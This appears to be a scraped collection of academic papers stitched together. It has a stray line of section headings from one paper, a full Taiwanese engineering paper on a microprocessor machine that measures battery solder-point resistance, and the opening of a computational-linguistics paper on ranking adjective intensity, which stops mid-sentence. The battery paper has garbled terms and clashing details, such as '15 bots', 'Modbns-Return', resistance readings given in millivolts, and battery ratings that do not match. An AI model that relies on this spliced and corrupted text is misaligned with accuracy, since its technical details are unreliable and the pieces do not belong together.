Discussion Summary of Results Implications for Software Development Threats to Validity Future Work Conclusions work_fg4lfai5wrhatp2jhlns3wm4si ---- 蓄電池焊接點檢查機之研製 Implementation of an Automatic Checking Machine for Battery Welding Condition Kuen-Cheng Wang, Chih-Hung Wang, Tsair-Rong Chen Department of Electrical Engineering National Changhua University of Education 2, ShiDa Road, Changhua, Taiwan, E-mail: kuenbao@ms76.hinet.net Abstract. The common automobile battery is composed of series connection of six units of battery chargers, with the tab welded between each battery charger for a purpose of connection. Thus the satisfactory welding point will be closely related to the lifetime of the battery. If the welding point is not solid enough, it will produce high resistance and heat in welding point upon numerous current discharge and charge, thus leading to a breakage of the welding point and causing damage to battery. This essay aims to implement a checking machine for battery welding condition. This machine based on a microprocessor as the core of control by combining a direct current power supply to measure the internal resistance of welding point of the battery so that the condition of the welding point can be judged. Upon the signal of inner resistance goes through an amplifier and then a buffer circuit, this analog signal will be converted into a digital signal and then be conveyed to the microprocessor. Finally, the configuration is displayed by an LED, which also reveals the results of measurement upon the comparison of the signal and a setup value. In the meanwhile the relay contact can be used to notify the PLC of the auto wire to show the condition of the battery, while RS485 or RS232 can be used to link with computer to record the welding condition of the battery. Keywords: Battery welding condition checking, large current charge and discharge, microprocessor. 1. Introduction A storage battery generally includes a plurality of electrode plates [1, 2], which are immersed in an electrolytic solution and interconnected sequentially in series. The series connections among the electrode plates are accomplished by soldering adjacent pairs of soldering lugs of the storage battery. If the soldering points are not firm, failure of the series connections is likely to occur. Moreover, in case there is air trapped in a soldering point, breaking of the soldering point is likely to occur when a large electric current passes there through. Furthermore, if government promote electric motor car for environmental protection someday, it is more important whether the pad is soldered well under the charging and discharging of large electric current [5-7]. Therefore, it is necessary to find ways to determine the quality of soldering points so as to ensure the quality of a storage battery product. In this study, we invented a device for inspecting a soldering point in a storage battery which can measure the inside resistance of the battery pad. In order to judge whether pad is good, the device can provide inspection results for storage by an external processing device. In general, lead-acid batteries have pasted plate anodes employing lead as the electrode material and the electrode surface is covered with a checkerboard grid of brown PbO2. The thin plates filled with active matter yield high output power. The PbO2 used in batteries is formed by bonding fine particles of lead oxide. These fine particles ensure a large area of contact with the electrolyte, which reduces the battery's internal resistance. The cathode plate is produced by mixing lead with dilute sulfuric acid and a small quantity of additives to form a paste-like material. Cathode plates may also made from soft, porous, spongy pure lead. The gray paste is applied to a lead alloy grid, and allowed to cure and dry to form an unfinished cathode plate. A porous separator made of insulating material is inserted between the anode plate and cathode plate. The anode and cathode plates must be parallel and as close as possible, but may not be in contact. When the anode and cathode plates are arranged in an alternating arrangement, the tabs on the electrode plates are connected with soldered lead alloy straps, forming the anode and cathode elements shown in Figures 1 and 2. The alternating arrangement of anode and cathode elements forms a cell, as shown in Figure 3. This cell can generate approximately 2 V of electromotive force. Because a larger plate area can yield greater current, several plates are connected in parallel in order to increase the current. To increase the voltage, two cells can be connected in series to yield 4 V, three cells connected in series to yield 6 V, four cells connected in series to yield 8 V, or six cells connected in series to yield 12 V. Ordinary car batteries are generally produced in this way. The cells shown in Figure 4 employ impact-resistant expanded polypropylene (EPP), which has been used to form six cells via injection molding. The anode plate and cathode plate will then be connected using soldered straps. The cathode strap from the other end of an anode output cell is soldered to the anode strap of the adjacent cell. Because the shorter the current path between two cells, the smaller the resistance between the cells, adjacent cells have a through connection to minimize resistance and ensure good discharge. Most car batteries employ this method. In the aforementioned six-cell battery, the cells and cell covers are bonded by thermal soldering, and each cell is sealed and separated from other cells. The cells are then filled with dilute sulfuric acid to complete the battery. When discharging, the PbO2 of the anode reacts with the sulfuric acid to form lead sulfate (PbSO4), and the lead of the cathode reacts with the sulfuric acid to form PbSO4. The following chemical equations (1) to (3) occur during discharge [3, 4]: Cathode:PbO2+4H + +SO4 2- +2e - → PbSO4+2H2O (1) Anode:Pb+SO4 2- → PbSO4+2e - (2) Battery:Pb+Pbo2+2H2SO4 →2PbSO4+2H2O (3) The following chemical equation occurs when the battery charges. 2PbSO4+2H2O→Pb+PbO2+2H2SO4 (4) Reduction of PbSO4 on the surface of the anodes to PbO2 is the main chemical reaction occurring during charging, but secondary reactions involving loss of water and corrosion of lead also occur as follows. PbSO4+2H2O→PbO2+H2SO4+2e - +2H + (5) 2H2O →O2+4H + +4e - (6) H2SO4 is also reduced to lead on the surface of the cathode, at which time the following two reactions occur at the cathode. PbSO4+2H + +2e→Pb+H2SO4 (7) 2H + +2e - → H 2 (8) After charging, the PbO2 on the anode plate is restored, and the cathode becomes spongy as PbSO4 on the surface absorbs electrons and is reduced to lead. In addition, the electrolysis of water leads to the release of oxygen at the anode and hydrogen at the cathode. Cell covers are equipped with cocks with small vent holes. Most ordinary batteries are of this type. Water will be lost due to evaporation after a battery has been in use for a period of time, and deionizer water must be added after the water level falls below the minimum level. Because adding water to batteries is troublesome for consumers, manufacturers developed batteries requiring no water addition. These batteries are often known as sealed lead-acid batteries (SLABS); calcium, instead of antimony, is alloyed with lead in this type of battery. Because the reduction of self-discharge causes the gassing point of hydrogen at the cathode to rise, the amount of hydrogen produced by electrolysis during charging is reduced in sealed batteries. The capacity of ordinary lead-acid batteries is expressed in Ampere-hours (Ah), which is the product of current (A) and discharge time (h). Because large capacity requires a large electrode plate area and large number of parallel electrode plates, a high-capacity battery will have a large volume. A 50Ah car battery should be able to produce a current of 5 A for 10 hours, which can be expressed as 0.1 C, or a current of 2.5 A for 20 hours, which can be expressed as 0.05 C. Starting a car engine requirements a transient current of approximately 100A-200A (depending on the type of car). Since the car engine is not running at this time, all power must be supplied by the battery. After float charging at a voltage of 14.4V, a car battery normally maintains a voltage of roughly 12.5 V. The transient starting voltage will fall to around 11 V (within three seconds), and may fall to 9-10 V if starting continues for five of six seconds. The voltage will drop more in winter than in summer. After the car starts, the generator will perform float charging of the battery at a voltage of 14.4 V. After the car is driven for a while, the charging current will gradually decrease. Fig. 1 anode plates are arranged in an alternating arrangement Fig. 2 cathode plates are arranged in an alternating arrangement Fig. 3 the cells Fig. 4 storage battery 2. Design of an Automatic Testing Machine for Battery Soldering The purpose of this research is to develop a device for inspecting a soldering point in a storage battery, which can provide inspection results for storage by an external processing device. This system shown as Figure 5 comprises a power supply unit and an inspecting unit. The power supply unit outputs a test power signal to be applied to the solder spot. The inspecting unit includes first and second inspecting terminals, and a control module. The first and second inspecting terminals are adapted to be connected electrically to the soldering point so as to detect response of the soldering point to application of the test power signal by the power supply unit. The control module determines if a detected response of the soldering point as detected through the first and second inspecting terminals falls within a predetermined range configured in the control module which generates an indication signal if the detected response falls outside the predetermined range, and generates an inspection result corresponding to the detected response. Fig. 5(a) a schematic sectional view of a conventional storage battery to be inspected by the device according to the present invention Fig. 5(b) a schematic view of the preferred embodiment of a device for inspecting a soldering spot in a storage battery Fig. 5(c) a schematic block diagram of the preferred embodiment The configuration of system is shown as follows. 200 ....... device for inspecting soldering spots in a storage battery 201 ……. probes 20 ……. Storage battery 21 ……. soldering spots 22 ……. lugs 30 ……. housing 40 ……. Power supply unit 50 ……. Inspecting unit 51 ……. First inspecting terminals 52 ……. Second inspecting terminals 53 ……. input module 55 ……. control module 54 ……. an analog-to-digital converting module 56 ……. transmission interface 57 ……. operating interface 58 ……. control interface 59 ……. indication interface 60 ……. external processing device R1 ……. resistance 61 ……. external peripheral device V1 ……. test source The advantages of this testing machine include that inspection of the soldering points is conducted by the inspecting unit using electrical signals, the quality of the soldering points can be accurately determined. Furthermore, by outputting the inspection results through the transmission interface, the inspection results can be stored for the future evaluation of the quality if a batch of storage battery products. 3. Soldering Point Signal Processing Design This soldering point testing machine's signal processing procedures and mechanisms are shown as follows: A.Input signal: Because the signal from a soldering point is small and easily disturbed by the external environment (such as electric and magnetic fields), the signal must be first processed to determine the correct signal value. B.Filter circuit: This circuit is laid out as shown in Figure 6, and has the following three main functions: 1)The filter circuit contains a low-pass filter comprising R1 and capacitor C1 to eliminate noise allow only the true signal to pass. 2)Overvoltage protection is provided by the two diodes D1 and D2. When an anomalous voltage occurs externally, the signal will remain clamped at a potential in the range of ±1 V, protecting IC elements. 3)The input impedance matching circuit relies on the high input impedance of operational amplifier U1 (greater 3 M Ω) to reduce the effective load. C.Amplifier circuit: This circuit serves relies on the operational amplifier and resistors R2＆R3 to amplify the small signal to a potential of 2Vdc,which is needed for subsequent processing by the analog-to-digital circuit. The amplification formula is shown as following. (9) In order to ensure that the operational amplifier's Ib signals are the same, care must be taken to ensure that R1=R2∥R3. If the Ib signals are not the same, changes in the ambition temperature will affect the operational amplifier's output value, causing signal bias. Capacitor C2 in parallel with resistor R2 chiefly serves to eliminate signal instability due to noise from the operational amplifier at high amplifications. D.Analog-to-digital circuit: Because the microprocessor can only read digital signals, and cannot read analog signals, this circuit is used to convert the analog signal to a digital signal. Attention must be paid to the resolution, sampling rate, and output connection when designing this circuit. The circuit is shown in Figure 7. Fig. 6 filter circuit Figure 7: analog to digital circuits The Ti Ads1110 IC is an analog-to-digital conversion circuit employing a differential model to encode a 0-2.048 Vdc analog signal as a 0-32767 digital signal. The resolution is 15 bots. and it employs a 12Cmethod. The circuit communicates with the microprocessor using SCL and SDA wires. The transmission rate is 15 times/sec. E.Microprocessor: An ST 72F324 8-bit microprocessor is responsible for reading the digital signal from the previous analog-to-digital circuit. After processing and updating by the microprocessor's internal program, the signal is sent to a display showing the current value. Current values are also stored in memory, and are available for reading and use via a RS-485 communications cable. In addition, the microprocessor must also compare the relays' setting parameters with the current parameters; when the setting parameters are reached, a relay action signal output is sent to the corresponding relay. Finally, the microprocessor must also handle editing functions from the keyboard (such as relay action settings), and update the values stored in memory. F.Display: The display shows the current value, relay output status, and computer online status. The display consists of a five-section display and LED circuit. The display's scanning connection with the microprocessor reduces the load on the microprocessor's I/O end. The microprocessor sends the number to be displayed to feet a-g, and also sends the potential to be displayed to the high-voltage position. This will cause the number to light up. For instance, if it is desired to display the number "2," the microprocessor will first connects feet c and f with high potential, and feet a, b, g, e, and d with low potential. It then sends high potential to D5 to display "2," This method is also used to send high potential to D4, D3, D2, and D1. Since the scanning rate is greater than the persistence of vision, a number with five places can be seen. G.Relay output: Responsible for receiving signals from the microprocessor signal and activating the relay coils to change the state of relay contacts (such as by changing a normally open contact to a normally closed contact). Attention must be paid to relay contact capacity, and erroneous action due to insufficient contact capacity should be avoided. H.RS-485computer connection: The RS-485employs the Modbns-Return communication mode, which involves a half duplex connection, for reading and writing. So-called half duplex refers to only being able to transmit or receive at one time, and not being able to simultaneously transmit and receive. Furthermore, the communications format must be the same as that of the server for a connection to be made. For instance, communications rate: such as 9600 bits/sec. or 19200 bits/sec.; parity detection: none, odd, the stop bit may be either 1 or 2. I.Keyboard actions: The main keyboard functions are used in entering and editing customers' different setting points. 4. Automatic Testing System A.The automatic testing system is shown in Figure 8. The testing steps are shown as follows. 1)Prepare the desired testing mold (tooling). 2)Turn switch "AUTO/MANUAL" to be "MANUAL". 3)Turn off the power of controller (SW1r). 4)Loose 2 screws of gate plates in front of mold(tooling) and then remove two gate plates, pull off plug then worker can remove mold. 5)Please put on the desired mold and let the gate plates hold mold then lock the screws; put on plug. 6)Turn off power of the weld checking controller, pull off plug on mold and loosen two fix handles on gate plate which is in front of the mold base, and remove mold. In reverse process, put on desired mold and plugs, and then turn on controller. B.The adjust steps are shown as follows. 1)First, adjust the distance between both guide-rails to suit the battery width. The adjusting equipment is shown in Figure 9. Open the front fix handles(2 PCS) and switch the type selector to be the desired type, then push guide rail to end point tightly, finally to look fix handle (2 PCS). Secondly, open the rear fix handles (2 PCS), and adjust the inside width of guide rail larger than the battery width at 2 mm; after that lock the fix handle(2 PCS). Fig. 8 automatic testing system Fig. 9 adjusting equipment 2)Advance AIR B(by switch no.20) and loosen screw on AIR B, then accord to the testing position of battery to adjust AIR B position, and be sure that photo switch (PHS3) is ON once the front of battery is sensed shown as Figure 10. 3)Adjust the distance between photo sensor PHS2 and A to fit battery length; once the first battery is sensed by photo switch PHS2, the AIR advances to hold the second battery which is shown as Figure 11.. Stopper plate Fig. 10 battery in system Stopping plate Fig. 11 Two batteries in system 4)Put one battery into testing area, turn on and adjust AIR B (by switch no.20) to hold the front of battery and then position AIR B. Lower AIR D (by switch no. 30) and loosen hand wheel of up-down fixed poles and handle of forward-backward moving plate, according to the battery height (let probes touch welded surface of elements group) to adjust them and be surd each probe touches plates, and then lock the hand wheel and handle. 5)Adjust the position of sensor PHS4, according to the length of battery and move it suitably (left or right) to let center of battery aim at center of AIR E to control NG battery position shown as Figure 12. Fig. 12 NG battery position 5. Experiment Process and Result When inspecting a storage battery, the test power signal (V1) is applied to the soldering points and the first and second inspecting terminal are coupled to the soldering points in pairs with the use of the probes. Since each soldering point has a small resistance (R1), the electric currents flowing through the soldering points as a result of application of the test signal (V1) can be converted by the analog-to-digital converting module into digital signals into resistance values corresponding to the soldering points. If the resistance value of one of the soldering points is determined to be a poor connection that needs to be re-soldered. Since inspection of the soldering point is conducted by the inspection unit using electrical signals, the quality of the soldering points can be accurately determined. Furthermore, by outputting the inspection result through the transmission interface, the inspection result can be stored for future evaluation the quality of batch of storage battery products. The testing machine can be installed in the auto-production line to inspect the soldering points of 12V-4AH battery. The resistance values of the soldering points are shown in Figure 13, which are 0.12, 0.07, 0.14, 0.08 and 0.13, respectively. The results show that each tab has different inside resistance. Each sampling of surface resistance isn't the same. But when the measuring value is over 0.2, it presents that the soldering point is fail. The Figure 14 shows resistance value: 0.15, 0.08, 0.13, 0.08and 0.25. Obviously, the last value is above general situation. After inspecting this battery, we find that the stander of solders level is only up to 60%. In order to have more examples, we test 36 batteries whose results are shown in Table 1. Certainly, different types of battery have different inside resistant and making the stander by examining ten batteries. Of course, the inspect machine we proposed is not perfect. The manufacture has to combine with practical experience for precise inspection. When the machine was used to inspect real battery soldering points, it was found that approximately 50 of every 1,000 batteries did not meet requirements. After individually inspecting these 50 batteries, correction was performed and the battery then retested if the electrode tab height was uneven. Afterwards, one defective product with poor soldering is on the right and left. Fig. 13 The resistance value of the soldering points are shown in meter Fig. 14 Another resistance value of the soldering points are shown in meter Table 1 Test results for 36 batteries BATT-SPEC 12V-14Ah (0.20mv up badly) Sport checking record (using amp) 10. 2 A Term Solder(1) Solder (2) Solder (3) Solder (4) Solder (5) 1 0.09 mv 0.10 mv 0.09 mv 0.09 mv 0.09 mv 2 0.08 mv 0.10 mv 0.09 mv 0.09 mv 0.09 mv 3 0.09 mv 0.10 mv 0.09 mv 0.10 mv 0.10 mv 4 0.12 mv 0.10 mv 0.09 mv 0.09 mv 0.10 mv 5 0.12 mv 0.11 mv 0.11 mv 0.11 mv 0.12 mv 6 0.10 mv 0.11 mv 0.11 mv 0.10 mv 0.10 mv 7 0.12 mv 0.07 mv 0.14 mv 0.08 mv 0.13 mv 8 0.11 mv 0.10 mv 0.11 mv 0.10 mv 0.10 mv 9 0.13 mv 0.12 mv 0.11 mv 0.12 mv 0.12 mv 10 0.11 mv 0.09 mv 0.10 mv 0.10 mv 0.09 mv 11 0.09 mv 0.11 mv 0.10 mv 0.10 mv 0.10 mv 12 0.15 mv 0.08 mv 0.13 mv 0.08 mv 0.25 mv 13 0.10 mv 0.10 mv 0.09 mv 0.09 mv 0.09 mv 14 0.12 mv 0.11 mv 0.11 mv 0.10 mv 0.11 mv 15 0.13 mv 0.11 mv 0.11 mv 0.11 mv 0.11 mv 16 0.11 mv 0.09 mv 0.10 mv 0.10 mv 0.09 mv 17 0.11 mv 0.11 mv 0.09 mv 0.09 mv 0.10 mv 18 0.09 mv 0.10 mv 0.09 mv 0.09 mv 0.09 mv 19 0.10 mv 0.09 mv 0.09 mv 0.10 mv 0.10 mv 20 0.09 mv 0.09 mv 0.09 mv 0.09 mv 0.09 mv 21 0.12 mv 0.10 mv 0.09 mv 0.09 mv 0.10 mv 22 0.12 mv 0.10 mv 0.09 mv 0.11 mv 0.10 mv 23 0.11 mv 0.11 mv 0.08 mv 0.09 mv 0.10 mv 24 0.09 mv 0.11 mv 0.10 mv 0.10 mv 0.11 mv 25 0.10 mv 0.09 mv 0.09 mv 0.09 mv 0.09 mv 26 0.10 mv 0.09 mv 0.08 mv 0.08 mv 0.09 mv 27 0.09 mv 0.08 mv 0.08 mv 0.08 mv 0.08 mv 28 0.09 mv 0.07 mv 0.08 mv 0.07 mv 0.09 mv 29 0.11 mv 0.09 mv 0.10 mv 0.09 mv 0.10 mv 30 0.11 mv 0.10 mv 0.11 mv 0.10 mv 0.09 mv 31 0.11 mv 0.10 mv 0.09 mv 0.10 mv 0.10 mv 32 0.12 mv 0.11 mv 0.09 mv 0.10 mv 0.09 mv 33 0.10 mv 0.10 mv 0.09 mv 0.10 mv 0.09 mv 34 0.11 mv 0.09 mv 0.10 mv 0.09 mv 0.10 mv 35 0.09 mv 0.09 mv 0.08 mv 0.08 mv 0.08 mv 36 0.10 mv 0.10 mv 0.09 mv 0.09 mv 0.10 mv 6. Conclusions This study successfully developed a microprocessor controlled battery soldering point testing machine with automatic PLC operation. This machine can quickly identify batteries with poor soldering points. And will not affect battery quality. In addition, the soldering point testing machine can be used in conjunction with a computer to record battery soldering point characteristics for use in subsequent battery tracking. References [1] Z. M. Salameh, M. A. Casacca and W. A. Lynch, “A mathematical model for lead-acid batteries,” IEEE Trans. on Energy Converison,Vol. 7, No. 1, Oct. 1992, pp. 93-97. [2] Y. H. Kim and H. D. Ha, “Design of interface circuits with electrical battery models,” IEEE Trans. on Industrial Electronics, Vol. 44, No. 1, Oct. 1997, pp. 81-86. [3] S. Sato and A. Kawamura, “A new estimation method of state of charge using terminal voltage and internal resistance for Lead-Acid battery,” Power Conversion Conference, Vol. 2, 2002, pp. 565-570. [4] A. Kawamura and T. Yanagihara, “State of charge estimation of sealed lead-acid batteries used for electric vehicles,” IEEE PESC’98 Rec., Oct. 1998, pp. 583-587. [5] T. Palanisamy and P. O. Box, “Charging techniques for a universal lead-acid battery charger”, Power Sources Symposium, 1990, pp.72-76. [6] E.M. Valeriote, T.G. chang and D.M. Jochim, “Fast charging of lead-acid batteries”, Battery Conference on Applications and Advances, 1994, pp. 33-38. [7] C.C. Hua and M.Y. Lin, “A study of charging control of lead-acid battery for electric vehicles,” IEEE Industrial Electronics, vol. 1, 2000, pp. 135-1. work_fklnz2kdpjhwfjysurpx7koiti ---- Transactions of the Association for Computational Linguistics, 1 (2013) 279–290. Action Editor: Lillian Lee. Submitted 11/2012; Revised 1/2013; Published 7/2013. c©2013 Association for Computational Linguistics. Good, Great, Excellent: Global Inference of Semantic Intensities Gerard de Melo ICSI, Berkeley demelo@icsi.berkeley.edu Mohit Bansal CS Division, UC Berkeley mbansal@cs.berkeley.edu Abstract Adjectives like good, great, and excellent are similar in meaning, but differ in intensity. In- tensity order information is very useful for language learners as well as in several NLP tasks, but is missing in most lexical resources (dictionaries, WordNet, and thesauri). In this paper, we present a primarily unsupervised approach that uses semantics from Web-scale data (e.g., phrases like good but not excel- lent) to rank words by assigning them posi- tions on a continuous scale. We rely on Mixed Integer Linear Programming to jointly deter- mine the ranks, such that individual decisions benefit from global information. When rank- ing English adjectives, our global algorithm achieves substantial improvements over pre- vious work on both pairwise and rank corre- lation metrics (specifically, 70% pairwise ac- curacy as compared to only 56% by previous work). Moreover, our approach can incorpo- rate external synonymy information (increas- ing its pairwise accuracy to 78%) and extends easily to new languages. We also make our code and data freely available.1 1 Introduction Current lexical resources such as dictionaries and thesauri do not provide information about the in- tensity order of words. For example, both WordNet (Miller, 1995) and Roget’s 21st Century Thesaurus (thesaurus.com) present acceptable, great, and su- perb as synonyms of the adjective good. However, a native speaker knows that these words represent varying intensity and can in fact generally be ranked by intensity as acceptable < good < great < superb. Similarly, warm < hot < scorching are identified as synonyms in these resources. Ranking information, 1http://demelo.org/gdm/intensity/ however, is crucial because it allows us to differen- tiate e.g. between various intensities of an emotion, and is hence very useful for humans when learning a language or judging product reviews, as well as for automatic text understanding and generation tasks such as sentiment and subjectivity analysis, recog- nizing textual entailment, question answering, sum- marization, and coreference and discourse analysis. In this work, we attempt to automatically rank sets of related words by intensity, focusing in par- ticular on adjectives. This is made possible by the vast amounts of world knowledge that are now avail- able. We use lexico-semantic information extracted from a Web-scale corpus in conjunction with an al- gorithm based on a Mixed Integer Linear Program (MILP). Linguistic analyses have identified phrases such as good but not great or hot and almost scorch- ing in a text corpus as sources of evidence about the relative intensities of words. However, pure infor- mation extraction approaches often fail to provide enough coverage for real-world downstream appli- cations (Tandon and de Melo, 2010), unless some form of advanced inference is used (Snow et al., 2006; Suchanek et al., 2009). In our work, we address this sparsity problem by relying on Web-scale data and using an MILP model that extends the pairwise scores to a more com- plete joint ranking of words on a continuous scale, while maintaining global constraints such as transi- tivity and giving more weight to the order of word pairs with higher corpus evidence scores. Instead of considering intensity ranking as a pairwise deci- sion process, we thus exploit the fact that individual decisions may benefit from global information, e.g. about how two words relate to some third word. Previous work (Sheinman and Tokunaga, 2009; Schulam and Fellbaum, 2010; Sheinman et al., 2012) has also used lexico-semantic patterns to or- 279 der adjectives. They mainly evaluate their algorithm on a set of pairwise decisions, but also present a par- titioning approach that attempts to form scales by placing each adjective to the left or right of pivot words. Unfortunately, this approach often fails be- cause many pairs lack order-based evidence even on the Web, as explained in more detail in Section 3. In contrast, our MILP jointly uses information from all relevant word pairs and captures com- plex interactions and inferences to produce inten- sity scales. We can thus obtain an order between two adjectives even when there is no explicit evi- dence in the corpus (using evidence for related pairs and transitive inference). Our global MILP is flex- ible and can also incorporate additional synonymy information if available (which helps the MILP find an even better ranking solution). Our approach also extends easily to new languages. We describe two approaches for this multilingual extension: pattern projection and cross-lingual MILPs. We evaluate our predicted intensity rankings us- ing both pairwise classification accuracy and rank- ing correlation coefficients, achieving strong results, significantly better than the previous approach by Sheinman & Tokunaga (32% relative error reduc- tion) and quite close to human-level performance. 2 Method In this section, we describe each step of our ap- proach to ordering adjectives on a single, relative scale. Our method can also be applied to other word classes and to languages other than English. 2.1 Web-based Scoring Model 2.1.1 Intensity Scales Near-synonyms may differ in intensity, e.g. joy vs. euphoria, or drizzle vs. rain. This is particu- larly true of adjectives, which can represent different degrees of a given quality or attribute such as size or age. Many adjectives are gradable and thus al- low for grading adverbial modifiers to express such intensity degrees, e.g., a house can be very big or extremely big. Often, however, completely differ- ent adjectives refer to varying degrees on the same scale, e.g., huge, gigantic, gargantuan. Even adjec- tives like enormous (or superb, impossible) that are considered non-gradable from a syntactic perspec- tive can be placed on a such a scale. Weak-Strong Patterns Strong-Weak Patterns ? (,) but not ? not ? (,) just ? ? (,) if not ? not ? (,) but just ? ? (,) although not ? not ? (,) still ? ? (,) though not ? not ? (,) but still ? ? (,) (and/or) even ? not ? (,) although still ? ? (,) (and/or) almost ? not ? (,) though still ? not only ? but ? ? (,) or very ? not just ? but ? Table 1: Ranking patterns used in this work. Among the patterns represented by the regular expressions above, we use only those that capture less than or equal to five words (to fit in the Google n-grams, see Section 2.1.2). Articles (a, an, the) are allowed to appear before the wildcards wherever possible. 2.1.2 Intensity Patterns Linguistic studies have found lexical patterns like ‘? but not ?’ (e.g. good but not great) to reveal order information between a pair of adjectives (Sheinman and Tokunaga, 2009). We assume that we have two sets of lexical patterns that allow us to infer the most likely ordering between two words when encoun- tered in a corpus. A first pattern set, Pws, contains patterns that reflect a weak-strong order between a pair of word (the first word is weaker than the sec- ond), and a second pattern set, Psw, captures the strong-weak order. See Table 1 for the adjective pat- terns that we used in this work (and see Section 4.1 for implementation details regarding our pattern col- lection). Many of these patterns also apply to other parts of speech (e.g. ‘drizzle but not rain’, ‘running or even sprinting’), with significant discrimination on the Web in the right direction. 2.1.3 Pairwise Scores Given an input set of words to be placed on a scale, we first collect evidence of their intensity or- der by using the above-mentioned intensity patterns and a large, Web-scale text corpus. Previous work on information extraction from limited-sized raw text corpora revealed that cover- age is often limited (Hearst, 1992; Hatzivassiloglou and McKeown, 1993). Some studies (Chklovski and Pantel, 2004; Sheinman and Tokunaga, 2009) used hit counts from an online search engine, but this is unstable and irreproducible (Kilgarriff, 2007). To avoid these issues, we use the largest available 280 (good, great) (great, good) (small, minute) good , but not great → 24492.0 not great , just good → 248.0 small , almost minute → 97.0 good , if not great → 1912.0 great or very good → 89.0 small , even minute → 41.0 good , though not great → 504.0 not great but still good → 47.0 good , or even great → 338.0 not just good but great → 181.0 good , almost great → 156.0 Table 2: Some examples from the Web-scale corpus of useful intensity-based phrases on adjective pairs. static corpus of counts, the Google n-grams corpus (Brants and Franz, 2006), which contains English n-grams (n = 1 to 5) and their observed frequency counts, generated from nearly 1 trillion word tokens and 95 billion sentences. We consider each pair of words (a1,a2) in the in- put set in turn. For each pattern p in the two pattern sets (weak-strong Pws and strong-weak Psw), we in- sert the word pair into the pattern as p(a1,a2) to get a phrasal query like “big but not huge”. This is done by replacing the two wildcards in the pattern by the two words in order. Finally, we scan the Web n- grams corpus in a batch approach similar to Bansal and Klein (2011) and collect frequencies of all our phrase queries. Table 2 depicts some examples of useful intensity-based phrase queries and their fre- quencies in the Web-scale corpus. We also collect frequencies for the input word unigrams and the pat- terns for normalization purposes. Given a word pair (a1,a2) and a corpus count function cnt, we define W1 = 1 P1 ∑ p1∈Pws cnt(p1(a1,a2)) S1 = 1 P2 ∑ p2∈Psw cnt(p2(a1,a2)) W2 = 1 P1 ∑ p1∈Pws cnt(p1(a2,a1)) S2 = 1 P2 ∑ p2∈Psw cnt(p2(a2,a1)) (1) with P1 = ∑ p1∈Pws cnt(p1) P2 = ∑ p2∈Psw cnt(p2), (2) such that the final overall weak-strong score is score(a1,a2) = (W1 −S1) − (W2 −S2) cnt(a1) · cnt(a2) . (3) Here W1 and S1 represent Web evidence of a1 and a2 being in the weak-strong and strong-weak relation, respectively. W2 and S2 fit the reverse pair (a2,a1) in the patterns and hence represent the strong-weak and weak-strong relations, respec- tively, in the opposite direction. Hence, overall, (W1 −S1) − (W2 −S2) represents the total weak- strong score of the pair (a1,a2), i.e. the score of a1 being on the left of a2 on a relative intensity scale, such that score(a1,a2) = −score(a2,a1). The raw frequencies in the score are divided by counts of the patterns and by individual word unigram counts to obtain a pointwise mutual information (PMI) style normalization and hence avoid any bias in the score due to high-frequency patterns or word unigrams.2 2.2 Global Ordering with an MILP 2.2.1 Objective and Constraints Given pairwise scores, we now aim at producing a global ranking of the input words that is much more informative than the original pairwise scores. Joint inference from multiple word pairs allows us to ben- efit from global information: Due to the sparsity of the pattern evidence, determining how two adjec- tives relate to each other can sometimes e.g. only be inferred by observing how each of them relate to some third adjective. We assume that we are given N input words A = a1, . . . ,aN that we wish to place on a linear scale, say [0, 1]. Thus each word ai is to be assigned a position xi ∈ [0, 1] based on the pairwise weak- strong weights score(ai,aj). A positive value for 2In preliminary experiments on a development set, we also evaluated other intuitive forms of normalization. 281 Figure 1: The input weak-strong data may contain one or more cycles, e.g. due to noisy patterns, so the final ranking will have to choose which input scores to honor and which to remove. score(ai,aj) means that ai is supposedly weaker than aj and hence we would like to obtain xi < xj. A negative value for score(ai,aj) means that ai is assumed to be stronger than aj, so we would want to obtain xi > xj. Therefore, intuitively, our goal corresponds to maximizing the objective ∑ i,j sgn(xj −xi) ·score(ai,aj) (4) Note that it is important to use the signum func- tion sgn() here, because we only care about the rel- ative order of xi and xj. Maximizing ∑ ij(xj −xi) · score(ai,aj) would lead to all words being placed at the edges of the scale, because the highest scores would dominate over all other ones. We do include the score magnitudes in the objective, because they help resolve contradictions in the pairwise scores (e.g., see Figure 1). This is discussed in more de- tail in Section 2.2.2. In order to maximize this non-differentiable ob- jective, we use Mixed Integer Linear Programming (MILP), a variant of linear programming in which some but not all of the variables are constrained to be integers. Using an MILP formalization, we can find a globally optimal solution in the joint deci- sion space, and unlike previous work, we jointly ex- ploit global information rather than just individual local (pairwise) scores. To encode the objective in a MILP, we need to introduce additional variables dij, wij, sij to capture the effect of the signum function, as explained below. We additionally also enable our MILP to make use of any external equivalence (synonymy) infor- mation E ⊆ {1, . . . ,N}×{1, . . . ,N} that may be available. In this context, two words are considered synonymous if they are close enough in meaning to be placed on (almost) the same position in the inten- sity scale. If (i,j) ∈ E, we can safely assume that ai, aj have near-equivalent intensity, so we should encourage xi, xj to remain close to each other. The MILP is defined as follows: maximize∑ (i,j) 6∈E (wij −sij) ·score(ai,aj) − ∑ (i,j)∈E (wij + sij) C subject to dij = xj −xi ∀i,j ∈{1, . . . ,N} dij −wijC ≤ 0 ∀i,j ∈{1, . . . ,N} dij + (1 −wij)C > 0 ∀i,j ∈{1, . . . ,N} dij + sijC ≥ 0 ∀i,j ∈{1, . . . ,N} dij − (1 −sij)C < 0 ∀i,j ∈{1, . . . ,N} xi ∈ [0, 1] ∀i ∈{1, . . . ,N} wij ∈{0, 1} ∀i,j ∈{1, . . . ,N} sij ∈{0, 1} ∀i,j ∈{1, . . . ,N} The difference variables dij simply capture differ- ences between xi, xj. C is any very large constant greater than ∑ i,j |score(ai,aj)|; the exact value is irrelevant. The indicator variables wij and sij are jointly used to determine the value of the signum function sgn(dij) = sgn(xj − xi). Variables wij become 1 if and only if dij > 0 and hence serve as indicator variables for weak-strong relationships in the output. Variables sij become 1 if and only if dij < 0 and hence serve as indicator variables for a strong-weak relationship in the output. The ob- jective encourages wij = 1 for score(ai,aj) > 0 and sij = 1 for score(ai,aj) < 0.3 When equiva- lence (synonymy) information is available, then for (i,j) ∈ E both sij = 0 and wij = 0 are encouraged. 2.2.2 Discussion Our MILP uses intensity evidence of all input pairs together and assimilates all the scores via global transitivity constraints to determine the posi- tions of the input words on a continuous real-valued scale. Hence, our approach addresses drawbacks 3In order to avoid numeric instability issues due to very small score(ai, aj) values after frequency normalization, in practice we have found it necessary to rescale them by a fac- tor of 1 over the smallest |score(ai, aj)| > 0. 282 Figure 2: Equivalence Information: Knowing that am, a2 are synonyms gives the MILP an indication of where to place an on the scale with respect to a1, a2, a3 of local or 